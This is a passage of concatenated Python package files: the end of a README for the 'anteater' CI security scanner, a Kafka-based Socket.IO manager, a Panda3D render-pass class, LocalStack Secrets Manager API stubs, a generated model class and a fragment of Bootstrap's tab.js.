desc: This function was depreciated in release X, use Y function.
```
Or perhaps stopping people from using 1.x versions of a framework:
``<script.src.*="https:\/\/ajax\.googleapis\.com\/ajax\/libs\/angularjs\/1.*<\/script>``
What if I get false postives?
-----------------------------
Easy, you set a RegExp to stop the match , kind of like RegExp'ception.
Let's say we want to stop use of MD5:
```
md245:
regex: md[245]
desc: "Insecure hashing algorithm"
```
This then incorrectly gets matched to the following:
``mystring = int(amd500) * 4``
We set a specific ignore RegEx, so it matches and then is unmatched by the
ignore entry.
``mystring.=.int\(amd500\).*``
Yet other instance of ``MD5`` continue to get flagged.
Binaries
--------
With anteater, if you pass the argument ``--binaries``, any binary found
causes a build failure on the originating pull request. It is not until a
sha256 checksum is set within anteater's YAML ignore files, that the build is
allowed to pass.
This means you can block people from checking in compiled objects, images, PDFs
etc that may have an unknown origin or tampering with the existing binary files.
An example:
```
$ anteater --binaries --project myproj --patchset /tmp/patch
Non Whitelisted Binary file: /folder/to/repo/images/pal.png
Please submit patch with this hash: 3aeae9c71e82942e2f34341e9185b14b7cca9142d53f8724bb8e9531a73de8b2
```
Let's enter the hash::
```
binaries:
images/pal.png:
- 3aeae9c71e82942e2f34341e9185b14b7cca9142d53f8724bb8e9531a73de8b2
```
Run the job again::
```
$ anteater --binaries --project myproj --patchset /tmp/patch
Found matching file hash for: /folder/to/repo/images/pal.png
```
This way we can sure binaries are not tampered with by means of a failed
cryptographic signature / checksum.
Any binaries not having a sha256 checksum will also be sent to the Virus Total
API for scanning.
Virus Total API
---------------
If the following flags (combined or individually) ``--ips``, ``-urls``, ``--binaries``
are used, anteater will perform a lookup to the Virus Total API.
IP addresses, will be have their DNS history checked for any previous or present connection
with known black listed domains marked as malicious or containing malware.
URLs, will be checked for any previous or present connection with known black listed domains
marked as malicious or containing malware.
As mentioned, Binaries will be sent to Virus Total and verified as clean / infected.
For more details and indepth documentation, please visit [readthedocs](http://anteater.readthedocs.io/en/latest/)
Last of all, if you do use anteater, I would love to know (twitter: @decodebytes)
and pull requests / issues are welcome!
Contribute
----------
Contributions are welcome.
Please make a pull request in a new branch, and not master.
```
git checkout -b mypatch
```
```
git push origin mypatch
```
Unit tests and PEP8 checks are in tox, so simply run the `tox` command before
pushing your code.
If your patch fixes and issue, please paste the issue url into the commit
message.
| PypiClean |
/sio/client_manager.py | import asyncio
import typing
from typing import (
Any,
AsyncGenerator,
AsyncIterator,
Dict,
Self,
)
from aiokafka.errors import KafkaConnectionError
from async_generator import asynccontextmanager
from socketio.asyncio_pubsub_manager import AsyncPubSubManager
from ..kafka.utils import get_kafka_consumer, get_kafka_producer
class Unsubscribed(Exception):
pass
class KafkaEvent:
def __init__(self, channel: str, message: str) -> None:
self.channel = channel
self.message = message
def __eq__(self, other: object) -> bool:
return (
isinstance(other, KafkaEvent)
and self.channel == other.channel
and self.message == other.message
)
def __repr__(self) -> str:
return f"Event(channel={self.channel!r}, message={self.message!r})"
class Subscriber:
def __init__(self, queue: asyncio.Queue) -> None:
self._queue = queue
async def __aiter__(self) -> AsyncGenerator:
try:
while True:
yield await self.get()
except Unsubscribed:
pass
async def __aexit__(self, exc_type, exc_value, exc_tb):
...
async def get(self) -> KafkaEvent:
item = await self._queue.get()
if item is None:
raise Unsubscribed()
return item
class KafkaBackend:
def __init__(self, url: str, group_id: str | None = None):
self._servers = url
self._consumer_channels: typing.Set = set()
self.group_id = group_id
async def connect(self) -> None:
self._producer = get_kafka_producer(bootstrap_servers=self._servers)
self._consumer = get_kafka_consumer(bootstrap_servers=self._servers, group_id=self.group_id)
await self._producer.start()
await self._consumer.start()
async def disconnect(self) -> None:
await self._producer.stop()
await self._consumer.stop()
async def subscribe(self, channel: str) -> None:
self._consumer_channels.add(channel)
self._consumer.subscribe(topics=self._consumer_channels)
async def unsubscribe(self, channel: str) -> None:
self._consumer.unsubscribe()
async def publish(self, channel: str, message: typing.Any) -> None:
await self._producer.send_and_wait(channel, message)
async def next_published(self) -> KafkaEvent:
message = await self._consumer.getone()
return KafkaEvent(channel=message.topic, message=message.value)
class SocketIoClientManager(AsyncPubSubManager):
def __init__(
self,
kafka_backend: KafkaBackend,
channel="socketio",
write_only=False,
logger=None,
):
super().__init__(channel, write_only, logger)
self.kafka_backend: KafkaBackend = kafka_backend
self._subscribers: Dict[str, Any] = {}
self._backend = kafka_backend
async def __aenter__(self) -> Self:
await self.on_start()
return self
async def __aexit__(self, *args: Any, **kwargs: Any) -> None:
await self.on_shutdown()
async def _listener(self) -> None:
while True:
event = await self._backend.next_published()
for queue in list(self._subscribers.get(event.channel, [])):
await queue.put(event)
async def on_start(self) -> None:
try:
await self._backend.connect()
except KafkaConnectionError as e:
await self.kafka_backend.disconnect()
raise RuntimeError("unable to connect to kafka")
self._listener_task = asyncio.create_task(self._listener())
async def on_shutdown(self) -> None:
if self._listener_task.done():
self._listener_task.result()
else:
self._listener_task.cancel()
await self._backend.disconnect()
@asynccontextmanager
async def subscribe(self, channel: str) -> AsyncIterator["Subscriber"]:
queue: asyncio.Queue = asyncio.Queue()
try:
if not self._subscribers.get(channel):
await self._backend.subscribe(channel)
self._subscribers[channel] = set([queue])
else:
self._subscribers[channel].add(queue)
yield Subscriber(queue)
self._subscribers[channel].remove(queue)
if not self._subscribers.get(channel):
del self._subscribers[channel]
await self._backend.unsubscribe(channel)
finally:
await queue.put(None)
async def _publish(self, message: Any):
await self._backend.publish(self.channel, message)
async def _listen(self):
async with self.subscribe(channel=self.channel) as subscriber: # type:ignore
async for event in subscriber:
yield event.message | PypiClean |
/panda3d_lion_render-0.1.0-py3-none-any.whl/lionrender/renderpass.py | import panda3d.core as p3d
class Pass:
def __init__(
self,
name,
pipe=None,
engine=None,
window=None,
camera=None,
scene=None,
shader=None,
frame_buffer_properties=None,
clear_color=p3d.LColor(0.41, 0.41, 0.41, 0.0),
share_depth_with=None,
):
self.name = name
self._pipe = pipe if pipe else base.pipe
self._engine = engine if engine else base.graphics_engine
self._window = window if window else base.win
self.node_path = p3d.NodePath(p3d.ModelNode(f'{self.name}_node_path'))
if scene:
scene.instance_to(self.node_path)
else:
quad = self._make_fullscreen_quad()
quad.reparent_to(self.node_path)
if shader:
self.node_path.set_shader(shader)
if not frame_buffer_properties:
frame_buffer_properties = self._make_default_buffer_props()
output_count = self._count_outputs(frame_buffer_properties)
self._camera = self._make_camera(camera)
self.buffer = self._make_buffer(frame_buffer_properties)
if share_depth_with:
success = self.buffer.share_depth_buffer(share_depth_with.buffer)
if success:
self.buffer.set_clear_depth_active(False)
self.node_path.set_attrib(p3d.DepthTestAttrib.make(p3d.RenderAttrib.MLessEqual))
else:
raise Exception('Unable to share depth buffer')
self.outputs = self._make_outputs(output_count)
self.output = self.outputs[0] if self.outputs else None
self.display_region = self.buffer.make_display_region(0, 1, 0, 1)
if self._camera:
self.display_region.set_camera(self._camera)
self.buffer.set_clear_color(clear_color)
def output_to(self, render2d, index=0):
card = self.buffer.getTextureCard()
card.setTexture(self.outputs[index])
card.reparentTo(render2d)
def _count_outputs(self, fb_props):
count = 0
if fb_props.get_rgb_color():
count += 1
count += fb_props.get_aux_rgba()
return count
def _make_outputs(self, count):
outputs = [p3d.Texture(f'{self.name}_output_{i}') for i in range(count)]
for i, output in enumerate(outputs):
attach_point = p3d.GraphicsOutput.RTP_color
if i > 0:
attach_point = getattr(p3d.GraphicsOutput, f'RTP_aux_rgba_{i - 1}')
self.buffer.add_render_texture(
output,
p3d.GraphicsOutput.RTM_bind_or_copy,
attach_point
)
return outputs
def _make_camera(self, source_cam):
cam = p3d.Camera(f'{self.name}_camera')
cam_nodepath = self.node_path.attach_new_node(cam)
cam.set_scene(self.node_path)
if source_cam:
def update(callback_data):
try:
lens = source_cam.get_node(0).get_lens()
except AttributeError:
lens = source_cam.find('**/+Camera').get_node(0).get_lens()
cam.set_lens(lens)
cam_nodepath.set_pos(source_cam.get_pos(self.node_path))
cam_nodepath.set_hpr(source_cam.get_hpr(self.node_path))
callback_data.upcall()
callback = p3d.CallbackNode(f'{self.name}_update_camera')
callback.set_cull_callback(update)
cam_nodepath.attach_new_node(callback)
return cam_nodepath
def _make_default_buffer_props(self):
fb_props = p3d.FrameBufferProperties()
fb_props.set_rgb_color(True)
fb_props.set_rgba_bits(8, 8, 8, 0)
fb_props.set_depth_bits(24)
return fb_props
def _make_buffer(self, fb_props):
return self._engine.make_output(
self._pipe,
self.name,
0,
fb_props,
p3d.WindowProperties(),
p3d.GraphicsPipe.BF_refuse_window | p3d.GraphicsPipe.BF_size_track_host,
self._window.get_gsg(),
self._window
)
def _make_fullscreen_quad(self):
tris = p3d.GeomTristrips(p3d.GeomEnums.UH_static)
tris.add_next_vertices(4)
vdata = p3d.GeomVertexData(
'abc',
p3d.GeomVertexFormat.get_empty(),
p3d.GeomEnums.UH_static
)
geom = p3d.Geom(vdata)
geom.add_primitive(tris)
geom.set_bounds(p3d.OmniBoundingVolume())
node = p3d.GeomNode(f'{self.name}_fullscreen_quad')
node.add_geom(geom)
return p3d.NodePath(node) | PypiClean |
/localstack_core-2.2.0-py3-none-any.whl/localstack/aws/api/secretsmanager/__init__.py | import sys
from datetime import datetime
from typing import Dict, List, Optional
if sys.version_info >= (3, 8):
from typing import TypedDict
else:
from typing_extensions import TypedDict
from localstack.aws.api import RequestContext, ServiceException, ServiceRequest, handler
BooleanType = bool
ClientRequestTokenType = str
DescriptionType = str
DurationType = str
ErrorMessage = str
ExcludeCharactersType = str
ExcludeLowercaseType = bool
ExcludeNumbersType = bool
ExcludePunctuationType = bool
ExcludeUppercaseType = bool
FilterValueStringType = str
IncludeSpaceType = bool
KmsKeyIdType = str
MaxResultsType = int
NameType = str
NextTokenType = str
NonEmptyResourcePolicyType = str
OwningServiceType = str
RandomPasswordType = str
RegionType = str
RequireEachIncludedTypeType = bool
RotationEnabledType = bool
RotationLambdaARNType = str
ScheduleExpressionType = str
SecretARNType = str
SecretIdType = str
SecretNameType = str
SecretStringType = str
SecretVersionIdType = str
SecretVersionStageType = str
StatusMessageType = str
TagKeyType = str
TagValueType = str
class FilterNameStringType(str):
description = "description"
name = "name"
tag_key = "tag-key"
tag_value = "tag-value"
primary_region = "primary-region"
owning_service = "owning-service"
all = "all"
class SortOrderType(str):
asc = "asc"
desc = "desc"
class StatusType(str):
InSync = "InSync"
Failed = "Failed"
InProgress = "InProgress"
class DecryptionFailure(ServiceException):
code: str = "DecryptionFailure"
sender_fault: bool = False
status_code: int = 400
class EncryptionFailure(ServiceException):
code: str = "EncryptionFailure"
sender_fault: bool = False
status_code: int = 400
class InternalServiceError(ServiceException):
code: str = "InternalServiceError"
sender_fault: bool = False
status_code: int = 400
class InvalidNextTokenException(ServiceException):
code: str = "InvalidNextTokenException"
sender_fault: bool = False
status_code: int = 400
class InvalidParameterException(ServiceException):
code: str = "InvalidParameterException"
sender_fault: bool = False
status_code: int = 400
class InvalidRequestException(ServiceException):
code: str = "InvalidRequestException"
sender_fault: bool = False
status_code: int = 400
class LimitExceededException(ServiceException):
code: str = "LimitExceededException"
sender_fault: bool = False
status_code: int = 400
class MalformedPolicyDocumentException(ServiceException):
code: str = "MalformedPolicyDocumentException"
sender_fault: bool = False
status_code: int = 400
class PreconditionNotMetException(ServiceException):
code: str = "PreconditionNotMetException"
sender_fault: bool = False
status_code: int = 400
class PublicPolicyException(ServiceException):
code: str = "PublicPolicyException"
sender_fault: bool = False
status_code: int = 400
class ResourceExistsException(ServiceException):
code: str = "ResourceExistsException"
sender_fault: bool = False
status_code: int = 400
class ResourceNotFoundException(ServiceException):
code: str = "ResourceNotFoundException"
sender_fault: bool = False
status_code: int = 400
class ReplicaRegionType(TypedDict, total=False):
Region: Optional[RegionType]
KmsKeyId: Optional[KmsKeyIdType]
AddReplicaRegionListType = List[ReplicaRegionType]
AutomaticallyRotateAfterDaysType = int
class CancelRotateSecretRequest(ServiceRequest):
SecretId: SecretIdType
class CancelRotateSecretResponse(TypedDict, total=False):
ARN: Optional[SecretARNType]
Name: Optional[SecretNameType]
VersionId: Optional[SecretVersionIdType]
class Tag(TypedDict, total=False):
Key: Optional[TagKeyType]
Value: Optional[TagValueType]
TagListType = List[Tag]
SecretBinaryType = bytes
class CreateSecretRequest(ServiceRequest):
Name: NameType
ClientRequestToken: Optional[ClientRequestTokenType]
Description: Optional[DescriptionType]
KmsKeyId: Optional[KmsKeyIdType]
SecretBinary: Optional[SecretBinaryType]
SecretString: Optional[SecretStringType]
Tags: Optional[TagListType]
AddReplicaRegions: Optional[AddReplicaRegionListType]
ForceOverwriteReplicaSecret: Optional[BooleanType]
LastAccessedDateType = datetime
class ReplicationStatusType(TypedDict, total=False):
Region: Optional[RegionType]
KmsKeyId: Optional[KmsKeyIdType]
Status: Optional[StatusType]
StatusMessage: Optional[StatusMessageType]
LastAccessedDate: Optional[LastAccessedDateType]
ReplicationStatusListType = List[ReplicationStatusType]
class CreateSecretResponse(TypedDict, total=False):
ARN: Optional[SecretARNType]
Name: Optional[SecretNameType]
VersionId: Optional[SecretVersionIdType]
ReplicationStatus: Optional[ReplicationStatusListType]
CreatedDateType = datetime
class DeleteResourcePolicyRequest(ServiceRequest):
SecretId: SecretIdType
class DeleteResourcePolicyResponse(TypedDict, total=False):
ARN: Optional[SecretARNType]
Name: Optional[NameType]
RecoveryWindowInDaysType = int
class DeleteSecretRequest(ServiceRequest):
SecretId: SecretIdType
RecoveryWindowInDays: Optional[RecoveryWindowInDaysType]
ForceDeleteWithoutRecovery: Optional[BooleanType]
DeletionDateType = datetime
class DeleteSecretResponse(TypedDict, total=False):
ARN: Optional[SecretARNType]
Name: Optional[SecretNameType]
DeletionDate: Optional[DeletionDateType]
DeletedDateType = datetime
class DescribeSecretRequest(ServiceRequest):
SecretId: SecretIdType
TimestampType = datetime
SecretVersionStagesType = List[SecretVersionStageType]
SecretVersionsToStagesMapType = Dict[SecretVersionIdType, SecretVersionStagesType]
NextRotationDateType = datetime
LastChangedDateType = datetime
LastRotatedDateType = datetime
class RotationRulesType(TypedDict, total=False):
AutomaticallyAfterDays: Optional[AutomaticallyRotateAfterDaysType]
Duration: Optional[DurationType]
ScheduleExpression: Optional[ScheduleExpressionType]
class DescribeSecretResponse(TypedDict, total=False):
ARN: Optional[SecretARNType]
Name: Optional[SecretNameType]
Description: Optional[DescriptionType]
KmsKeyId: Optional[KmsKeyIdType]
RotationEnabled: Optional[RotationEnabledType]
RotationLambdaARN: Optional[RotationLambdaARNType]
RotationRules: Optional[RotationRulesType]
LastRotatedDate: Optional[LastRotatedDateType]
LastChangedDate: Optional[LastChangedDateType]
LastAccessedDate: Optional[LastAccessedDateType]
DeletedDate: Optional[DeletedDateType]
NextRotationDate: Optional[NextRotationDateType]
Tags: Optional[TagListType]
VersionIdsToStages: Optional[SecretVersionsToStagesMapType]
OwningService: Optional[OwningServiceType]
CreatedDate: Optional[TimestampType]
PrimaryRegion: Optional[RegionType]
ReplicationStatus: Optional[ReplicationStatusListType]
FilterValuesStringList = List[FilterValueStringType]
class Filter(TypedDict, total=False):
Key: Optional[FilterNameStringType]
Values: Optional[FilterValuesStringList]
FiltersListType = List[Filter]
PasswordLengthType = int
class GetRandomPasswordRequest(ServiceRequest):
PasswordLength: Optional[PasswordLengthType]
ExcludeCharacters: Optional[ExcludeCharactersType]
ExcludeNumbers: Optional[ExcludeNumbersType]
ExcludePunctuation: Optional[ExcludePunctuationType]
ExcludeUppercase: Optional[ExcludeUppercaseType]
ExcludeLowercase: Optional[ExcludeLowercaseType]
IncludeSpace: Optional[IncludeSpaceType]
RequireEachIncludedType: Optional[RequireEachIncludedTypeType]
class GetRandomPasswordResponse(TypedDict, total=False):
RandomPassword: Optional[RandomPasswordType]
class GetResourcePolicyRequest(ServiceRequest):
SecretId: SecretIdType
class GetResourcePolicyResponse(TypedDict, total=False):
ARN: Optional[SecretARNType]
Name: Optional[NameType]
ResourcePolicy: Optional[NonEmptyResourcePolicyType]
class GetSecretValueRequest(ServiceRequest):
SecretId: SecretIdType
VersionId: Optional[SecretVersionIdType]
VersionStage: Optional[SecretVersionStageType]
class GetSecretValueResponse(TypedDict, total=False):
ARN: Optional[SecretARNType]
Name: Optional[SecretNameType]
VersionId: Optional[SecretVersionIdType]
SecretBinary: Optional[SecretBinaryType]
SecretString: Optional[SecretStringType]
VersionStages: Optional[SecretVersionStagesType]
CreatedDate: Optional[CreatedDateType]
KmsKeyIdListType = List[KmsKeyIdType]
class ListSecretVersionIdsRequest(ServiceRequest):
SecretId: SecretIdType
MaxResults: Optional[MaxResultsType]
NextToken: Optional[NextTokenType]
IncludeDeprecated: Optional[BooleanType]
class SecretVersionsListEntry(TypedDict, total=False):
VersionId: Optional[SecretVersionIdType]
VersionStages: Optional[SecretVersionStagesType]
LastAccessedDate: Optional[LastAccessedDateType]
CreatedDate: Optional[CreatedDateType]
KmsKeyIds: Optional[KmsKeyIdListType]
SecretVersionsListType = List[SecretVersionsListEntry]
class ListSecretVersionIdsResponse(TypedDict, total=False):
Versions: Optional[SecretVersionsListType]
NextToken: Optional[NextTokenType]
ARN: Optional[SecretARNType]
Name: Optional[SecretNameType]
class ListSecretsRequest(ServiceRequest):
IncludePlannedDeletion: Optional[BooleanType]
MaxResults: Optional[MaxResultsType]
NextToken: Optional[NextTokenType]
Filters: Optional[FiltersListType]
SortOrder: Optional[SortOrderType]
class SecretListEntry(TypedDict, total=False):
ARN: Optional[SecretARNType]
Name: Optional[SecretNameType]
Description: Optional[DescriptionType]
KmsKeyId: Optional[KmsKeyIdType]
RotationEnabled: Optional[RotationEnabledType]
RotationLambdaARN: Optional[RotationLambdaARNType]
RotationRules: Optional[RotationRulesType]
LastRotatedDate: Optional[LastRotatedDateType]
LastChangedDate: Optional[LastChangedDateType]
LastAccessedDate: Optional[LastAccessedDateType]
DeletedDate: Optional[DeletedDateType]
NextRotationDate: Optional[NextRotationDateType]
Tags: Optional[TagListType]
SecretVersionsToStages: Optional[SecretVersionsToStagesMapType]
OwningService: Optional[OwningServiceType]
CreatedDate: Optional[TimestampType]
PrimaryRegion: Optional[RegionType]
SecretListType = List[SecretListEntry]
class ListSecretsResponse(TypedDict, total=False):
SecretList: Optional[SecretListType]
NextToken: Optional[NextTokenType]
class PutResourcePolicyRequest(ServiceRequest):
SecretId: SecretIdType
ResourcePolicy: NonEmptyResourcePolicyType
BlockPublicPolicy: Optional[BooleanType]
class PutResourcePolicyResponse(TypedDict, total=False):
ARN: Optional[SecretARNType]
Name: Optional[NameType]
class PutSecretValueRequest(ServiceRequest):
SecretId: SecretIdType
ClientRequestToken: Optional[ClientRequestTokenType]
SecretBinary: Optional[SecretBinaryType]
SecretString: Optional[SecretStringType]
VersionStages: Optional[SecretVersionStagesType]
class PutSecretValueResponse(TypedDict, total=False):
ARN: Optional[SecretARNType]
Name: Optional[SecretNameType]
VersionId: Optional[SecretVersionIdType]
VersionStages: Optional[SecretVersionStagesType]
RemoveReplicaRegionListType = List[RegionType]
class RemoveRegionsFromReplicationRequest(ServiceRequest):
SecretId: SecretIdType
RemoveReplicaRegions: RemoveReplicaRegionListType
class RemoveRegionsFromReplicationResponse(TypedDict, total=False):
ARN: Optional[SecretARNType]
ReplicationStatus: Optional[ReplicationStatusListType]
class ReplicateSecretToRegionsRequest(ServiceRequest):
SecretId: SecretIdType
AddReplicaRegions: AddReplicaRegionListType
ForceOverwriteReplicaSecret: Optional[BooleanType]
class ReplicateSecretToRegionsResponse(TypedDict, total=False):
ARN: Optional[SecretARNType]
ReplicationStatus: Optional[ReplicationStatusListType]
class RestoreSecretRequest(ServiceRequest):
SecretId: SecretIdType
class RestoreSecretResponse(TypedDict, total=False):
ARN: Optional[SecretARNType]
Name: Optional[SecretNameType]
class RotateSecretRequest(ServiceRequest):
SecretId: SecretIdType
ClientRequestToken: Optional[ClientRequestTokenType]
RotationLambdaARN: Optional[RotationLambdaARNType]
RotationRules: Optional[RotationRulesType]
RotateImmediately: Optional[BooleanType]
class RotateSecretResponse(TypedDict, total=False):
ARN: Optional[SecretARNType]
Name: Optional[SecretNameType]
VersionId: Optional[SecretVersionIdType]
class StopReplicationToReplicaRequest(ServiceRequest):
SecretId: SecretIdType
class StopReplicationToReplicaResponse(TypedDict, total=False):
ARN: Optional[SecretARNType]
TagKeyListType = List[TagKeyType]
class TagResourceRequest(ServiceRequest):
SecretId: SecretIdType
Tags: TagListType
class UntagResourceRequest(ServiceRequest):
SecretId: SecretIdType
TagKeys: TagKeyListType
class UpdateSecretRequest(ServiceRequest):
SecretId: SecretIdType
ClientRequestToken: Optional[ClientRequestTokenType]
Description: Optional[DescriptionType]
KmsKeyId: Optional[KmsKeyIdType]
SecretBinary: Optional[SecretBinaryType]
SecretString: Optional[SecretStringType]
class UpdateSecretResponse(TypedDict, total=False):
ARN: Optional[SecretARNType]
Name: Optional[SecretNameType]
VersionId: Optional[SecretVersionIdType]
class UpdateSecretVersionStageRequest(ServiceRequest):
SecretId: SecretIdType
VersionStage: SecretVersionStageType
RemoveFromVersionId: Optional[SecretVersionIdType]
MoveToVersionId: Optional[SecretVersionIdType]
class UpdateSecretVersionStageResponse(TypedDict, total=False):
ARN: Optional[SecretARNType]
Name: Optional[SecretNameType]
class ValidateResourcePolicyRequest(ServiceRequest):
SecretId: Optional[SecretIdType]
ResourcePolicy: NonEmptyResourcePolicyType
class ValidationErrorsEntry(TypedDict, total=False):
CheckName: Optional[NameType]
ErrorMessage: Optional[ErrorMessage]
ValidationErrorsType = List[ValidationErrorsEntry]
class ValidateResourcePolicyResponse(TypedDict, total=False):
PolicyValidationPassed: Optional[BooleanType]
ValidationErrors: Optional[ValidationErrorsType]
class SecretsmanagerApi:
service = "secretsmanager"
version = "2017-10-17"
@handler("CancelRotateSecret")
def cancel_rotate_secret(
self, context: RequestContext, secret_id: SecretIdType
) -> CancelRotateSecretResponse:
raise NotImplementedError
@handler("CreateSecret")
def create_secret(
self,
context: RequestContext,
name: NameType,
client_request_token: ClientRequestTokenType = None,
description: DescriptionType = None,
kms_key_id: KmsKeyIdType = None,
secret_binary: SecretBinaryType = None,
secret_string: SecretStringType = None,
tags: TagListType = None,
add_replica_regions: AddReplicaRegionListType = None,
force_overwrite_replica_secret: BooleanType = None,
) -> CreateSecretResponse:
raise NotImplementedError
@handler("DeleteResourcePolicy")
def delete_resource_policy(
self, context: RequestContext, secret_id: SecretIdType
) -> DeleteResourcePolicyResponse:
raise NotImplementedError
@handler("DeleteSecret")
def delete_secret(
self,
context: RequestContext,
secret_id: SecretIdType,
recovery_window_in_days: RecoveryWindowInDaysType = None,
force_delete_without_recovery: BooleanType = None,
) -> DeleteSecretResponse:
raise NotImplementedError
@handler("DescribeSecret")
def describe_secret(
self, context: RequestContext, secret_id: SecretIdType
) -> DescribeSecretResponse:
raise NotImplementedError
@handler("GetRandomPassword")
def get_random_password(
self,
context: RequestContext,
password_length: PasswordLengthType = None,
exclude_characters: ExcludeCharactersType = None,
exclude_numbers: ExcludeNumbersType = None,
exclude_punctuation: ExcludePunctuationType = None,
exclude_uppercase: ExcludeUppercaseType = None,
exclude_lowercase: ExcludeLowercaseType = None,
include_space: IncludeSpaceType = None,
require_each_included_type: RequireEachIncludedTypeType = None,
) -> GetRandomPasswordResponse:
raise NotImplementedError
@handler("GetResourcePolicy")
def get_resource_policy(
self, context: RequestContext, secret_id: SecretIdType
) -> GetResourcePolicyResponse:
raise NotImplementedError
@handler("GetSecretValue")
def get_secret_value(
self,
context: RequestContext,
secret_id: SecretIdType,
version_id: SecretVersionIdType = None,
version_stage: SecretVersionStageType = None,
) -> GetSecretValueResponse:
raise NotImplementedError
@handler("ListSecretVersionIds")
def list_secret_version_ids(
self,
context: RequestContext,
secret_id: SecretIdType,
max_results: MaxResultsType = None,
next_token: NextTokenType = None,
include_deprecated: BooleanType = None,
) -> ListSecretVersionIdsResponse:
raise NotImplementedError
@handler("ListSecrets")
def list_secrets(
self,
context: RequestContext,
include_planned_deletion: BooleanType = None,
max_results: MaxResultsType = None,
next_token: NextTokenType = None,
filters: FiltersListType = None,
sort_order: SortOrderType = None,
) -> ListSecretsResponse:
raise NotImplementedError
@handler("PutResourcePolicy")
def put_resource_policy(
self,
context: RequestContext,
secret_id: SecretIdType,
resource_policy: NonEmptyResourcePolicyType,
block_public_policy: BooleanType = None,
) -> PutResourcePolicyResponse:
raise NotImplementedError
@handler("PutSecretValue")
def put_secret_value(
self,
context: RequestContext,
secret_id: SecretIdType,
client_request_token: ClientRequestTokenType = None,
secret_binary: SecretBinaryType = None,
secret_string: SecretStringType = None,
version_stages: SecretVersionStagesType = None,
) -> PutSecretValueResponse:
raise NotImplementedError
@handler("RemoveRegionsFromReplication")
def remove_regions_from_replication(
self,
context: RequestContext,
secret_id: SecretIdType,
remove_replica_regions: RemoveReplicaRegionListType,
) -> RemoveRegionsFromReplicationResponse:
raise NotImplementedError
@handler("ReplicateSecretToRegions")
def replicate_secret_to_regions(
self,
context: RequestContext,
secret_id: SecretIdType,
add_replica_regions: AddReplicaRegionListType,
force_overwrite_replica_secret: BooleanType = None,
) -> ReplicateSecretToRegionsResponse:
raise NotImplementedError
@handler("RestoreSecret")
def restore_secret(
self, context: RequestContext, secret_id: SecretIdType
) -> RestoreSecretResponse:
raise NotImplementedError
@handler("RotateSecret")
def rotate_secret(
self,
context: RequestContext,
secret_id: SecretIdType,
client_request_token: ClientRequestTokenType = None,
rotation_lambda_arn: RotationLambdaARNType = None,
rotation_rules: RotationRulesType = None,
rotate_immediately: BooleanType = None,
) -> RotateSecretResponse:
raise NotImplementedError
@handler("StopReplicationToReplica")
def stop_replication_to_replica(
self, context: RequestContext, secret_id: SecretIdType
) -> StopReplicationToReplicaResponse:
raise NotImplementedError
@handler("TagResource")
def tag_resource(
self, context: RequestContext, secret_id: SecretIdType, tags: TagListType
) -> None:
raise NotImplementedError
@handler("UntagResource")
def untag_resource(
self, context: RequestContext, secret_id: SecretIdType, tag_keys: TagKeyListType
) -> None:
raise NotImplementedError
@handler("UpdateSecret")
def update_secret(
self,
context: RequestContext,
secret_id: SecretIdType,
client_request_token: ClientRequestTokenType = None,
description: DescriptionType = None,
kms_key_id: KmsKeyIdType = None,
secret_binary: SecretBinaryType = None,
secret_string: SecretStringType = None,
) -> UpdateSecretResponse:
raise NotImplementedError
@handler("UpdateSecretVersionStage")
def update_secret_version_stage(
self,
context: RequestContext,
secret_id: SecretIdType,
version_stage: SecretVersionStageType,
remove_from_version_id: SecretVersionIdType = None,
move_to_version_id: SecretVersionIdType = None,
) -> UpdateSecretVersionStageResponse:
raise NotImplementedError
@handler("ValidateResourcePolicy")
def validate_resource_policy(
self,
context: RequestContext,
resource_policy: NonEmptyResourcePolicyType,
secret_id: SecretIdType = None,
) -> ValidateResourcePolicyResponse:
raise NotImplementedError | PypiClean |
/mindfoundry.client.analyze-1.20.4.tar.gz/mindfoundry.client.analyze-1.20.4/src/mindfoundry/client/analyze/swagger/models/future.py | from typing import Any, Dict, List, Type, TypeVar, Union
import attr
from ..models.future_output_of_your_request import FutureOutputOfYourRequest
from ..models.status import Status
from ..types import UNSET, Unset
T = TypeVar("T", bound="Future")
@attr.s(auto_attribs=True)
class Future:
"""
Attributes:
future_id (Union[Unset, str]):
status (Union[Unset, Status]):
response (Union[Unset, None, FutureOutputOfYourRequest]):
"""
future_id: Union[Unset, str] = UNSET
status: Union[Unset, Status] = UNSET
response: Union[Unset, None, FutureOutputOfYourRequest] = UNSET
additional_properties: Dict[str, Any] = attr.ib(init=False, factory=dict)
def to_dict(self) -> Dict[str, Any]:
future_id = self.future_id
status: Union[Unset, str] = UNSET
if not isinstance(self.status, Unset):
status = self.status.value
response: Union[Unset, None, Dict[str, Any]] = UNSET
if not isinstance(self.response, Unset):
response = self.response.to_dict() if self.response else None
field_dict: Dict[str, Any] = {}
field_dict.update(self.additional_properties)
field_dict.update({
})
if future_id is not UNSET:
field_dict["futureId"] = future_id
if status is not UNSET:
field_dict["status"] = status
if response is not UNSET:
field_dict["response"] = response
return field_dict
@classmethod
def from_dict(cls: Type[T], src_dict: Dict[str, Any]) -> T:
d = src_dict.copy()
future_id = d.pop("futureId", UNSET)
_status = d.pop("status", UNSET)
status: Union[Unset, Status]
if isinstance(_status, Unset):
status = UNSET
else:
status = Status(_status)
_response = d.pop("response", UNSET)
response: Union[Unset, None, FutureOutputOfYourRequest]
if _response is None:
response = None
elif isinstance(_response, Unset):
response = UNSET
else:
response = FutureOutputOfYourRequest.from_dict(_response)
future = cls(
future_id=future_id,
status=status,
response=response,
)
future.additional_properties = d
return future
@property
def additional_keys(self) -> List[str]:
return list(self.additional_properties.keys())
def __getitem__(self, key: str) -> Any:
return self.additional_properties[key]
def __setitem__(self, key: str, value: Any) -> None:
self.additional_properties[key] = value
def __delitem__(self, key: str) -> None:
del self.additional_properties[key]
def __contains__(self, key: str) -> bool:
return key in self.additional_properties | PypiClean |
/odooku_odoo_base-11.0.7-py35-none-any.whl/odoo/addons/web/static/lib/bootstrap/js/tab.js | +function ($) {
'use strict';
// TAB CLASS DEFINITION
// ====================
var Tab = function (element) {
this.element = $(element)
}
Tab.VERSION = '3.3.4'
Tab.TRANSITION_DURATION = 150
Tab.prototype.show = function () {
var $this = this.element
var $ul = $this.closest('ul:not(.dropdown-menu)')
var selector = $this.data('target')
if (!selector) {
selector = $this.attr('href')
selector = selector && selector.replace(/.*(?=#[^\s]*$)/, '') // strip for ie7
}
if ($this.parent('li').hasClass('active')) return
var $previous = $ul.find('.active:last a')
var hideEvent = $.Event('hide.bs.tab', {
relatedTarget: $this[0]
})
var showEvent = $.Event('show.bs.tab', {
relatedTarget: $previous[0]
})
$previous.trigger(hideEvent)
$this.trigger(showEvent)
